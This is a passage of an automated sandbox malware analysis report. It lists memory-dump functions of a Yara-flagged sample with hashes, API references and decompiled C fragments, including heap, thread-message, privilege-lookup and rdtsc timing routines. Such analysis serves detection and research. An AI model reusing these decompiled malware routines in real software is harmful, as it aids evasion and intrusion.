                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 93%
                                    			E004088A0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CC0( &_v284, 0x104);
						E0041A330( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                    0x004088ab
                                    0x004088b3
                                    0x004088b5
                                    0x004088ba
                                    0x004088bf
                                    0x004088d2
                                    0x004088d7
                                    0x004088e0
                                    0x004088ec
                                    0x004088ff
                                    0x00408904
                                    0x00408907
                                    0x00408910
                                    0x00408922
                                    0x00408927
                                    0x0040892c
                                    0x00000000
                                    0x00000000
                                    0x0040892e
                                    0x00408932
                                    0x00000000
                                    0x00000000
                                    0x00408934
                                    0x00000000
                                    0x00408932
                                    0x00408936
                                    0x00408939
                                    0x0040893f
                                    0x00408941
                                    0x0040894c
                                    0x00408951
                                    0x00408954
                                    0x00408961
                                    0x0040896c
                                    0x0040896e
                                    0x00408974
                                    0x00408978
                                    0x0040897b
                                    0x0040897b
                                    0x00408982
                                    0x00408985
                                    0x0040898a
                                    0x00408997
                                    0x004088c6
                                    0x004088c6
                                    0x004088c6

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                    • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                    • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                    • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: hA
                                    • API String ID: 1279760036-1221461045
                                    • Opcode ID: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                    • Instruction ID: a92fe9ae98136920995dbb6c9f8f490c0a28fc78c4328f558ebb06bb2a3a51d6
                                    • Opcode Fuzzy Hash: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                    • Instruction Fuzzy Hash: D1F04F763002156FDA24EF99EC84EE7736DEF88360B10855AFA4D9B201D931EA5587E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 74%
                                    			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                    0x00407260
                                    0x0040726f
                                    0x00407273
                                    0x0040727e
                                    0x0040728e
                                    0x0040729e
                                    0x004072a3
                                    0x004072aa
                                    0x004072ac
                                    0x004072ad
                                    0x004072ba
                                    0x004072bc
                                    0x004072be
                                    0x004072db
                                    0x004072db
                                    0x00000000
                                    0x004072dd
                                    0x004072e2

                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
                                    • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                    • Opcode Fuzzy Hash: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
                                    • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041852D, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                    • Instruction ID: 90963e86cd57150ed095c23e32252a4bc52356d2fee715913416bcb79a385e3c
                                    • Opcode Fuzzy Hash: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                    • Instruction Fuzzy Hash: B60117B2200208BBCB44DF99DC80DEB77ADEF8C354F118249FA0D97241DA34E951CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004184B4, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E004184B4(void* __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t12;

				_push(0x3c);
				 *((intOrPtr*)(__ecx + 0x5506bd67)) =  *((intOrPtr*)(__ecx + 0x5506bd67)) - __edx;
				_t9 = _v0;
				_t5 = _t9 + 0xc74; // 0xc74
				E00418DB0(0x21c5d300, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t12;
			}





                                    0x004184b4
                                    0x004184bb
                                    0x004184c3
                                    0x004184cf
                                    0x004184d7
                                    0x004184ed
                                    0x004184f1

                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                    • Instruction ID: c5ff80edf742f8a68fdad7a16a09cf22f23f4b8e9e8c60093caf9f0ba1e94a67
                                    • Opcode Fuzzy Hash: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                    • Instruction Fuzzy Hash: ADE06DB1200304ABDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                    0x004184cf
                                    0x004184d7
                                    0x004184ed
                                    0x004184f1

                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                    • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                    • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 36%
                                    			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}







                                    0x00418497
                                    0x0041849f
                                    0x004184a2
                                    0x004184a6
                                    0x004184ab
                                    0x004184ad
                                    0x004184b1

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                    • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                    • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                    0x0041863a
                                    0x00418650
                                    0x00418654

                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID:
                                    • API String ID: 3899507212-0
                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                    • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                    • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                    • Instruction ID: 33e441391f2a0b1e398b113c2e5be7578dcf48d956c97fd458980edbc3fb36c1
                                    • Opcode Fuzzy Hash: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                    • Instruction Fuzzy Hash: 4BE04F316002507BDB219BA48C89FD73FA89F4A750F1588A9B9999B242C570EA04C6D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                    • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                    • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 007426F8, Relevance: .0, Instructions: 44COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                    • Instruction ID: 78f78bb550a95b0fcf64094b977285db58b5f29d6fd65e38ee07b8f2edf3f2b1
                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                    • Instruction Fuzzy Hash: D5F0FF20324049EBDB4AEA18885577A3395EB94300FA8C038BA49C7303D7299D128290
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00730060, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007310D0, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00731148, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                    • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                    • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                    • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0073010C, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                    • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                    • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                    • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007301D4, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                    • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                    • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                    • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072F8CC, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                    • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                    • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                    • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00731930, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                    • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
